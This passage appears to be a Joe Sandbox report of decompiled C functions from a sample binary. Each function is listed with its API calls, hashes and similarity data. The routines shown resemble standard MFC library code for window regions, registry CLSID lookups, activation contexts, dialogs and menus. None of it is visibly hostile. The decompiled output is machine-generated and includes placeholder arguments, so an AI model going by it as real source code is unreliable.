                  				 *((intOrPtr*)(_t75 - 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t75 - 0x10)) + 0x5c))(0x88, E00411D22( *_t56 - _t35, _t77, 0x800, 0, 0, 0), 0, 0x80000000, _t57 + 0xfffffff0,  *((intOrPtr*)(_t74 + 0x68)) - 0x10, 0x20, 0x20, 0, 0, 0);
                  				E00406A7F(_t74,  *((intOrPtr*)(_t75 + 8)));
                  				if( *((intOrPtr*)(_t75 - 0x10)) != 0) {
                  					 *(_t75 - 0x14) = 0;
                  					 *((intOrPtr*)(_t75 - 0x18)) = 0x452b4c;
                  					 *(_t75 - 4) = 0;
                  					E00423059(0x452b4c, _t75 - 0x18, 0, CreateEllipticRgn(0, 0, 0x20, 0x20));
                  					SetWindowRgn( *(_t74 + 0x20),  *(_t75 - 0x14), 1);
                  					E0040EE3C(0x452b4c, _t75 - 0x18, SetCapture( *(_t74 + 0x20)));
                  					SetTimer( *(_t74 + 0x20), 0xe000, 0x32, 0);
                  					 *(_t75 - 4) =  *(_t75 - 4) | 0xffffffff;
                  					 *((intOrPtr*)(_t75 - 0x18)) = 0x452b4c;
                  					E0040ADD4(0x452b4c, _t75 - 0x18, 0, _t74,  *(_t75 - 4));
                  				}
                  				return E00431B73( *((intOrPtr*)(_t75 - 0x10)));
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041A02E
                  • GetSystemMetrics.USER32 ref: 0041A052
                  • GetSystemMetrics.USER32 ref: 0041A05E
                  • GetSystemMetrics.USER32 ref: 0041A068
                  • GetSystemMetrics.USER32 ref: 0041A075
                  • CreateEllipticRgn.GDI32(00000000,00000000,00000020,00000020), ref: 0041A0DC
                  • SetWindowRgn.USER32(?,?,00000001), ref: 0041A0F3
                  • SetCapture.USER32(?), ref: 0041A0FC
                  • SetTimer.USER32(?,0000E000,00000032,00000000), ref: 0041A113
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MetricsSystem$H_prolog3$CaptureCreateEllipticException@8ThrowTimerWindow
                  • String ID: L+E
                  • API String ID: 3309283864-4127712704
                  • Opcode ID: 1575d33e1ff024e78d8027ad71dd57e5d72c5d3502752463ac89e66c02c900ad
                  • Instruction ID: a2aa5e01c565e6b9afcf6d6bee22cb5d65a4782031c2c85be5729872fcbbbe56
                  • Opcode Fuzzy Hash: 1575d33e1ff024e78d8027ad71dd57e5d72c5d3502752463ac89e66c02c900ad
                  • Instruction Fuzzy Hash: 77311071640745AFDB20AFA6CC4AF6FBBB4FF85704F00091EB241A62E1CB74A940CB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E00428ECF(void* __ebx, void* _a4, intOrPtr _a8) {
                  				void* _v8;
                  				void* _v12;
                  				int _v16;
                  				char* _v20;
                  				int _v24;
                  				signed int _t35;
                  				int* _t44;
                  
                  				_t44 = 0;
                  				_v12 = 0;
                  				_v20 = E004014F0(_a8, 0x104);
                  				_v16 = 0x104;
                  				_v24 = 0;
                  				if(RegOpenKeyA(0x80000000, ?str?,  &_v12) == 0) {
                  					_v8 = 0;
                  					if(RegOpenKeyA(_v12, _a4,  &_v8) == 0) {
                  						_a4 = 0;
                  						if(RegOpenKeyA(_v8, "InProcServer32",  &_a4) == 0) {
                  							_t35 = RegQueryValueExA(_a4, 0x44f0f5, 0,  &_v24, _v20,  &_v16);
                  							asm("sbb esi, esi");
                  							_t44 =  ~_t35 + 1;
                  							RegCloseKey(_a4);
                  						}
                  						RegCloseKey(_v8);
                  					}
                  					RegCloseKey(_v12);
                  				}
                  				E0040A356(_a8, 0xffffffff);
                  				return _t44;
                  			}

                  APIs
                  • RegOpenKeyA.ADVAPI32(80000000,CLSID,004542E8), ref: 00428F09
                  • RegOpenKeyA.ADVAPI32(00000000,00000000,00000000), ref: 00428F1D
                  • RegOpenKeyA.ADVAPI32(00000000,InProcServer32,?), ref: 00428F38
                  • RegQueryValueExA.ADVAPI32(?,0044F0F5,00000000,?,?,?), ref: 00428F52
                  • RegCloseKey.ADVAPI32(?), ref: 00428F62
                  • RegCloseKey.ADVAPI32(00000000), ref: 00428F67
                  • RegCloseKey.ADVAPI32(?), ref: 00428F6C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CloseOpen$QueryValue
                  • String ID: CLSID$InProcServer32$BE
                  • API String ID: 3523390698-3134485842
                  • Opcode ID: bdafd1ae98bdaf0f2cb46c77699de44374e36c91a30ffc45151d91ef1fc49913
                  • Instruction ID: f24009deadb1cf4b51eab228b599f0d3e410838491bd349ca97d2e46ea76daff
                  • Opcode Fuzzy Hash: bdafd1ae98bdaf0f2cb46c77699de44374e36c91a30ffc45151d91ef1fc49913
                  • Instruction Fuzzy Hash: 23119D72900128BFDF10AFA5CC40DEEBB79EF44750B104126F914A7260D7749F45CBA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 88%
                  			E00414A58(intOrPtr __ecx, intOrPtr _a4) {
                  				intOrPtr _v8;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				intOrPtr _t5;
                  				_Unknown_base(*)()* _t10;
                  				struct HINSTANCE__* _t18;
                  				void* _t19;
                  				char _t21;
                  				intOrPtr _t23;
                  				_Unknown_base(*)()* _t24;
                  				_Unknown_base(*)()* _t25;
                  
                  				_push(__ecx);
                  				_t5 = __ecx;
                  				_t16 = _a4;
                  				 *((intOrPtr*)(__ecx)) = _a4;
                  				 *((intOrPtr*)(__ecx + 4)) = 0;
                  				_v8 = __ecx;
                  				_t21 =  *0x4664dc; // 0x0
                  				if(_t21 == 0) {
                  					_push(_t19);
                  					_t18 = GetModuleHandleA("KERNEL32");
                  					_t22 = _t18;
                  					if(_t18 == 0) {
                  						L2:
                  						E00406436(0, _t16, _t18, _t19, _t22);
                  					}
                  					 *0x4664cc = GetProcAddress(_t18, "CreateActCtxA");
                  					 *0x4664d0 = GetProcAddress(_t18, "ReleaseActCtx");
                  					 *0x4664d4 = GetProcAddress(_t18, "ActivateActCtx");
                  					_t10 = GetProcAddress(_t18, "DeactivateActCtx");
                  					_pop(_t18);
                  					 *0x4664d8 = _t10;
                  					_pop(_t19);
                  					_t23 =  *0x4664cc; // 0x0
                  					if(_t23 == 0) {
                  						__eflags =  *0x4664d0; // 0x0
                  						if(__eflags != 0) {
                  							goto L2;
                  						} else {
                  							__eflags =  *0x4664d4; // 0x0
                  							if(__eflags != 0) {
                  								goto L2;
                  							} else {
                  								__eflags = _t10;
                  								if(__eflags != 0) {
                  									goto L2;
                  								}
                  							}
                  						}
                  					} else {
                  						_t24 =  *0x4664d0; // 0x0
                  						if(_t24 == 0) {
                  							goto L2;
                  						} else {
                  							_t25 =  *0x4664d4; // 0x0
                  							if(_t25 == 0) {
                  								goto L2;
                  							} else {
                  								_t22 = _t10;
                  								if(_t10 == 0) {
                  									goto L2;
                  								}
                  							}
                  						}
                  					}
                  					_t5 = _v8;
                  					 *0x4664dc = 1;
                  				}
                  				return _t5;
                  			}

















                  APIs
                  • GetModuleHandleA.KERNEL32(KERNEL32), ref: 00414A81
                  • GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 00414A9E
                  • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 00414AAB
                  • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 00414AB8
                  • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 00414AC5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                  • API String ID: 667068680-3617302793
                  • Opcode ID: 41b6fbd96fd88b6159bd24798665531820fea7318a93b66cdc67d38a1ab704a9
                  • Instruction ID: 4fcf1ef3ac8ca3b18eba1858758f2dadc0745a3739b28e71c64bd8d406f4101a
                  • Opcode Fuzzy Hash: 41b6fbd96fd88b6159bd24798665531820fea7318a93b66cdc67d38a1ab704a9
                  • Instruction Fuzzy Hash: 6911A771D80211BBCB20DFA6AC849577EACFA95B56312443FE50483221EAB84885CF5E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 86%
                  			E00448C0F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t18;
                  				void* _t23;
                  				void* _t39;
                  				intOrPtr _t43;
                  				void* _t44;
                  
                  				_t39 = __edx;
                  				_t29 = __ebx;
                  				_push(0x14);
                  				E00431A9B(E0044CC9D, __ebx, __edi, __esi);
                  				E00448F7B(_t44 - 0x14, 0);
                  				_t43 =  *0x467440; // 0x0
                  				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
                  				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
                  				_t18 = E00447826( *((intOrPtr*)(_t44 + 8)), E00447732(0x4674d8));
                  				_t41 = _t18;
                  				if(_t18 == 0) {
                  					if(_t43 == 0) {
                  						_push( *((intOrPtr*)(_t44 + 8)));
                  						_push(_t44 - 0x10);
                  						_t23 = E00448A8D(__ebx, _t41, _t43, __eflags);
                  						__eflags = _t23 - 0xffffffff;
                  						if(_t23 == 0xffffffff) {
                  							E00430C66(_t44 - 0x20, "bad cast");
                  							E00430CF4(_t44 - 0x20, 0x45e790);
                  						}
                  						_t41 =  *((intOrPtr*)(_t44 - 0x10));
                  						 *0x467440 =  *((intOrPtr*)(_t44 - 0x10));
                  						E00447769( *((intOrPtr*)(_t44 - 0x10)));
                  						E0044911C(_t29, _t39, _t41, _t43, _t41);
                  					} else {
                  						_t41 = _t43;
                  					}
                  				}
                  				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
                  				E00448FA3(_t44 - 0x14);
                  				return E00431B73(_t41);
                  			}









                  APIs
                  • __EH_prolog3.LIBCMT ref: 00448C16
                  • std::_Lockit::_Lockit.LIBCPMT ref: 00448C20
                  • int.LIBCPMT ref: 00448C37
                    • Part of subcall function 00447732: std::_Lockit::_Lockit.LIBCPMT ref: 00447745
                  • std::locale::_Getfacet.LIBCPMT ref: 00448C40
                  • codecvt.LIBCPMT ref: 00448C5A
                  • std::bad_exception::bad_exception.LIBCMT ref: 00448C6E
                  • __CxxThrowException@8.LIBCMT ref: 00448C7C
                  • std::locale::facet::_Incref.LIBCPMT ref: 00448C8C
                  • std::locale::facet::facet_Register.LIBCPMT ref: 00448C92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                  • String ID: bad cast
                  • API String ID: 577375395-3145022300
                  • Opcode ID: 08916e8601030b88c8772c978c6339b6b33d72f4ec2f0943d0d0d6baf5f80f4f
                  • Instruction ID: b9ca8288bc3497393f69db73b50c762de20d67692500da4ed427a5f0706e090c
                  • Opcode Fuzzy Hash: 08916e8601030b88c8772c978c6339b6b33d72f4ec2f0943d0d0d6baf5f80f4f
                  • Instruction Fuzzy Hash: 4701C43194521997EF05FB61C882ABE7235AF44329F54021FF1106B2E1DF7C9A059BAD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 91%
                  			E0041EA0E(void* __esi) {
                  				void* _t1;
                  				struct HINSTANCE__* _t2;
                  				_Unknown_base(*)()* _t6;
                  				void* _t7;
                  				void* _t8;
                  				void* _t9;
                  				void* _t10;
                  
                  				_t10 = __esi;
                  				if( *0x466500 == 0) {
                  					_t2 = GetModuleHandleA("KERNEL32");
                  					 *0x466500 = _t2;
                  					_t14 = _t2;
                  					if(_t2 == 0) {
                  						_t2 = E00406436(_t7, _t8, _t9, __esi, _t14);
                  					}
                  					_push(_t10);
                  					 *0x4664ec = GetProcAddress(_t2, "CreateActCtxW");
                  					 *0x4664f0 = GetProcAddress( *0x466500, "ReleaseActCtx");
                  					 *0x4664f4 = GetProcAddress( *0x466500, "ActivateActCtx");
                  					_t6 = GetProcAddress( *0x466500, "DeactivateActCtx");
                  					 *0x4664f8 = _t6;
                  					return _t6;
                  				}
                  				return _t1;
                  			}











                  APIs
                  • GetModuleHandleA.KERNEL32(KERNEL32,0041EB28), ref: 0041EA1C
                  • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 0041EA3D
                  • GetProcAddress.KERNEL32(ReleaseActCtx), ref: 0041EA4F
                  • GetProcAddress.KERNEL32(ActivateActCtx), ref: 0041EA61
                  • GetProcAddress.KERNEL32(DeactivateActCtx), ref: 0041EA73
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
                  • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                  • API String ID: 417325364-2424895508
                  • Opcode ID: a55b86447eb033fc2c2ed33bbb383f0b3294b9c3705bd7f49da141e42ade0cd5
                  • Instruction ID: 797181131107fc9c9d18895cd176618ea7f7a223a3ca38473e3e5917ec363889
                  • Opcode Fuzzy Hash: a55b86447eb033fc2c2ed33bbb383f0b3294b9c3705bd7f49da141e42ade0cd5
                  • Instruction Fuzzy Hash: E6F0F878D40311BADB11AF72BC0AA463EA4FB48756712443BEC1192276FBF994448E8E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 94%
                  			E00417C2D(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				signed int _t54;
                  				void* _t58;
                  				signed int _t59;
                  				signed int _t63;
                  				signed int _t71;
                  				signed int _t84;
                  				void* _t94;
                  				struct HINSTANCE__* _t96;
                  				signed int _t97;
                  				void* _t98;
                  				signed int _t100;
                  				void* _t101;
                  				void* _t102;
                  
                  				_t102 = __eflags;
                  				_t94 = __edx;
                  				_push(0x24);
                  				E00431ACE(E0044B5B3, __ebx, __edi, __esi);
                  				_t100 = __ecx;
                  				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
                  				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
                  				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
                  				_t54 = E0041F363(__ebx, __edi, __ecx, _t102);
                  				_t96 =  *(_t54 + 0xc);
                  				_t84 = 0;
                  				_t103 =  *(_t100 + 0x58);
                  				if( *(_t100 + 0x58) != 0) {
                  					_t96 =  *(E0041F363(0, _t96, _t100, _t103) + 0xc);
                  					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x58), 5));
                  					 *(_t101 - 0x18) = _t54;
                  				}
                  				if( *(_t101 - 0x18) != _t84) {
                  					_t54 = LockResource( *(_t101 - 0x18));
                  					 *(_t101 - 0x1c) = _t54;
                  				}
                  				if( *(_t101 - 0x1c) != _t84) {
                  					_t86 = _t100;
                  					 *(_t101 - 0x14) = E004177A7(_t84, _t100, __eflags);
                  					E0040EEF5(__eflags);
                  					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
                  					 *(_t101 - 0x2c) = _t84;
                  					 *(_t101 - 0x24) = _t84;
                  					__eflags =  *(_t101 - 0x14) - _t84;
                  					if(__eflags != 0) {
                  						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
                  						if(__eflags != 0) {
                  							__eflags = IsWindowEnabled( *(_t101 - 0x14));
                  							if(__eflags != 0) {
                  								EnableWindow( *(_t101 - 0x14), 0);
                  								 *(_t101 - 0x2c) = 1;
                  								_t84 = E00403AA0();
                  								 *(_t101 - 0x24) = _t84;
                  								__eflags = _t84;
                  								if(__eflags != 0) {
                  									_t86 = _t84;
                  									__eflags =  *((intOrPtr*)( *_t84 + 0x128))();
                  									if(__eflags != 0) {
                  										_t86 = _t84;
                  										__eflags = E00412C5B(_t84);
                  										if(__eflags != 0) {
                  											_t86 = _t84;
                  											E00412C76(_t84, 0);
                  											 *(_t101 - 0x28) = 1;
                  										}
                  									}
                  								}
                  							}
                  						}
                  					}
                  					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
                  					E00410F0D(__eflags, _t100);
                  					_t58 = E0040EE3C(_t84, _t86,  *(_t101 - 0x14));
                  					_push(_t96);
                  					_push(_t58);
                  					_push( *(_t101 - 0x1c));
                  					_t59 = E00417A77(_t84, _t100, _t94, _t96, _t100, __eflags);
                  					_t97 = 0;
                  					__eflags = _t59;
                  					if(_t59 != 0) {
                  						__eflags =  *(_t100 + 0x3c) & 0x00000010;
                  						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
                  							_t98 = 4;
                  							_t71 = E00412B38(_t100);
                  							__eflags = _t71 & 0x00000100;
                  							if((_t71 & 0x00000100) != 0) {
                  								_t98 = 5;
                  							}
                  							E0040E9F9(_t100, _t98);
                  							_t97 = 0;
                  							__eflags = 0;
                  						}
                  						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
                  						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
                  							E00412D05(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
                  						}
                  					}
                  					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
                  					__eflags =  *(_t101 - 0x28) - _t97;
                  					if( *(_t101 - 0x28) != _t97) {
                  						E00412C76(_t84, 1);
                  					}
                  					__eflags =  *(_t101 - 0x2c) - _t97;
                  					if( *(_t101 - 0x2c) != _t97) {
                  						EnableWindow( *(_t101 - 0x14), 1);
                  					}
                  					__eflags =  *(_t101 - 0x14) - _t97;
                  					if(__eflags != 0) {
                  						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
                  						if(__eflags == 0) {
                  							SetActiveWindow( *(_t101 - 0x14));
                  						}
                  					}
                  					 *((intOrPtr*)( *_t100 + 0x60))();
                  					E004177E3(_t84, _t100, _t97, _t100, __eflags);
                  					__eflags =  *(_t100 + 0x58) - _t97;
                  					if( *(_t100 + 0x58) != _t97) {
                  						FreeResource( *(_t101 - 0x18));
                  					}
                  					_t63 =  *(_t100 + 0x44);
                  					goto L31;
                  				} else {
                  					_t63 = _t54 | 0xffffffff;
                  					L31:
                  					return E00431B73(_t63);
                  				}
                  			}

















                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 00417C34
                  • FindResourceA.KERNEL32(?,?,00000005), ref: 00417C67
                  • LoadResource.KERNEL32(?,00000000), ref: 00417C6F
                    • Part of subcall function 0040EEF5: UnhookWindowsHookEx.USER32(?), ref: 0040EF25
                  • LockResource.KERNEL32(?,00000024,00401950), ref: 00417C80
                  • GetDesktopWindow.USER32 ref: 00417CB3
                  • IsWindowEnabled.USER32(?), ref: 00417CC1
                  • EnableWindow.USER32(?,00000000), ref: 00417CD0
                    • Part of subcall function 00412C5B: IsWindowEnabled.USER32(?), ref: 00412C64
                    • Part of subcall function 00412C76: EnableWindow.USER32(?,?), ref: 00412C87
                  • EnableWindow.USER32(?,00000001), ref: 00417DB5
                  • GetActiveWindow.USER32 ref: 00417DC0
                  • SetActiveWindow.USER32(?,?,00000024,00401950), ref: 00417DCE
                  • FreeResource.KERNEL32(?,?,00000024,00401950), ref: 00417DEA
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchHookLoadLockUnhookWindows
                  • String ID:
                  • API String ID: 964565984-0
                  • Opcode ID: da8b189c92737f86523d476402b0640bbffa953fb9a8a761f84fa50aacb807c6
                  • Instruction ID: 5835e455a6056e309436c10977b7ae5060b56ff2e2b656983c9ac1280d1162a1
                  • Opcode Fuzzy Hash: da8b189c92737f86523d476402b0640bbffa953fb9a8a761f84fa50aacb807c6
                  • Instruction Fuzzy Hash: CC519E30A046099FDB21AFA6D8456FEBBB1BF44705F20043EE501B62A1DB789981CB9D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 81%
                  			E0040607D(int __ebx, void* __edi, void* __esi, void* __eflags) {
                  				struct HMENU__* _t91;
                  				int _t92;
                  				struct HMENU__* _t100;
                  				int _t105;
                  				CHAR* _t111;
                  				signed int* _t116;
                  				signed int _t127;
                  				int* _t130;
                  				int* _t132;
                  				int _t134;
                  				void* _t135;
                  
                  				_t121 = __ebx;
                  				_push(0x130);
                  				E00431B04(E0044AC2D, __ebx, __edi, __esi);
                  				_t132 =  *(_t135 + 0x10);
                  				 *(_t135 - 0x130) =  *(_t135 + 8);
                  				_t91 =  *(_t135 + 0xc);
                  				_t134 = 0;
                  				 *(_t135 - 0x128) = _t91;
                  				 *((intOrPtr*)(_t135 - 0x138)) = 0;
                  				 *(_t135 - 0x134) = 0;
                  				_t92 = GetMenuItemCount(_t91);
                  				 *(_t135 - 0x13c) = _t92;
                  				 *(_t135 - 0x118) = 0;
                  				 *(_t135 - 0x114) = 0;
                  				if( *(_t135 + 0x14) == 1) {
                  					 *(_t135 - 0x114) =  *_t132;
                  				}
                  				 *(_t135 - 0x11c) = _t134;
                  				if(_t92 <= _t134) {
                  					L25:
                  					_t132[ *(_t135 + 0x14)] =  *(_t135 - 0x118);
                  					L26:
                  					return E00431B87(_t121, _t132, _t134);
                  				}
                  				_t134 = 0x400;
                  				do {
                  					 *(_t135 - 0x120) = GetSubMenu( *(_t135 - 0x128),  *(_t135 - 0x11c));
                  					_t121 = GetMenuState( *(_t135 - 0x128),  *(_t135 - 0x11c), _t134);
                  					if( *(_t135 - 0x120) != 0 || (_t121 & 0x00000800) == 0) {
                  						 *(_t135 - 0x12c) = 0;
                  						__eflags =  *(_t135 + 0x18);
                  						if( *(_t135 + 0x18) != 0) {
                  							__eflags =  *(_t135 + 0x14) - 5;
                  							if( *(_t135 + 0x14) == 5) {
                  								__eflags = _t132[5] - 1;
                  								if(_t132[5] == 1) {
                  									 *(_t135 - 0x12c) = GetSubMenu( *(_t135 - 0x130),  *(_t135 - 0x114));
                  								}
                  							}
                  						}
                  						_t100 = GetMenuStringA( *(_t135 - 0x128),  *(_t135 - 0x11c), _t135 - 0x110, 0x100, _t134);
                  						__eflags =  *(_t135 - 0x120);
                  						if( *(_t135 - 0x120) == 0) {
                  							__eflags = _t100;
                  							if(_t100 <= 0) {
                  								goto L23;
                  							}
                  							_push(_t135 - 0x110);
                  							_push(GetMenuItemID( *(_t135 - 0x128),  *(_t135 - 0x11c)));
                  							_t121 = _t121 | _t134;
                  							__eflags = _t121;
                  							_push(_t121);
                  							goto L22;
                  						} else {
                  							__eflags =  *(_t135 - 0x12c);
                  							if(__eflags == 0) {
                  								_t105 = GetMenuItemCount( *(_t135 - 0x120));
                  								__eflags = _t105;
                  								if(_t105 == 0) {
                  									goto L23;
                  								}
                  								_push(_t135 - 0x110);
                  								_push( *(_t135 - 0x120));
                  								_push(_t121 & 0x000000ff | 0x00000410);
                  								L22:
                  								InsertMenuA( *(_t135 - 0x130),  *(_t135 - 0x114), ??, ??, ??);
                  								 *(_t135 - 0x114) =  *(_t135 - 0x114) + 1;
                  								_t76 = _t135 - 0x118;
                  								 *_t76 =  *(_t135 - 0x118) + 1;
                  								__eflags =  *_t76;
                  								goto L23;
                  							}
                  							_push( *((intOrPtr*)(E0041F363(_t121, _t132, _t134, __eflags) + 0x10)));
                  							E00406039(_t121, _t135 - 0x124, _t130, _t132, _t134, __eflags);
                  							_t111 =  *(_t135 - 0x124);
                  							 *(_t135 - 4) =  *(_t135 - 4) & 0x00000000;
                  							__eflags =  *(_t111 - 0xc);
                  							if( *(_t111 - 0xc) != 0) {
                  								E00405D76(_t135 - 0x124, 0x20);
                  							}
                  							E00405EC1(_t135 - 0x124, _t135 - 0x110);
                  							_t121 =  *(_t135 - 0x120);
                  							AppendMenuA( *(_t135 - 0x12c), 0x10, _t121,  *(_t135 - 0x124));
                  							 *(_t135 - 4) =  *(_t135 - 4) | 0xffffffff;
                  							_t116 =  &(_t132[ *(_t135 + 0x14)]);
                  							 *_t116 =  *_t116 & 0x00000000;
                  							 *((intOrPtr*)(_t116 - 4)) =  *((intOrPtr*)(_t116 - 4)) + 1;
                  							 *((intOrPtr*)(_t135 - 0x138)) = 1;
                  							 *(_t135 - 0x134) = _t121;
                  							E004010B0( &(( *(_t135 - 0x124))[0xfffffffffffffff0]), _t130);
                  							goto L23;
                  						}
                  					} else {
                  						_t127 =  *(_t135 + 0x14);
                  						_t121 =  *(_t135 - 0x118);
                  						_t130 =  &(_t132[_t127]);
                  						 *_t130 =  *(_t135 - 0x118);
                  						 *(_t135 - 0x118) = 0;
                  						if(_t127 < 5) {
                  							 *(_t135 - 0x114) =  *(_t135 - 0x114) + _t130[1];
                  						}
                  						 *(_t135 + 0x14) =  *(_t135 + 0x14) + 2;
                  					}
                  					L23:
                  					 *(_t135 - 0x11c) =  *(_t135 - 0x11c) + 1;
                  				} while ( *(_t135 - 0x11c) <  *(_t135 - 0x13c));
                  				if( *((intOrPtr*)(_t135 - 0x138)) != 0) {
                  					goto L26;
                  				}
                  				goto L25;
                  			}















                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Menu$Item$Count$AppendH_prolog3_InsertStateString
                  • String ID:
                  • API String ID: 2171526683-0
                  • Opcode ID: 59b0d03c7a4de24bfd5d3264c4ab79dec59a58f44716801c7520d46a18b6b469
                  • Instruction ID: 28db6550187b75f0f8ddc5cf35a0011be1a11c4ba9a9efde7d1322a6cca787e0
                  • Opcode Fuzzy Hash: 59b0d03c7a4de24bfd5d3264c4ab79dec59a58f44716801c7520d46a18b6b469
                  • Instruction Fuzzy Hash: ED6103708002289FCB25DF14CD85BD9BBB5FF09314F0141EAE64AA62A1D7745EA1CF98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 0231A2D8
                  Strings
                  Memory Dump Source
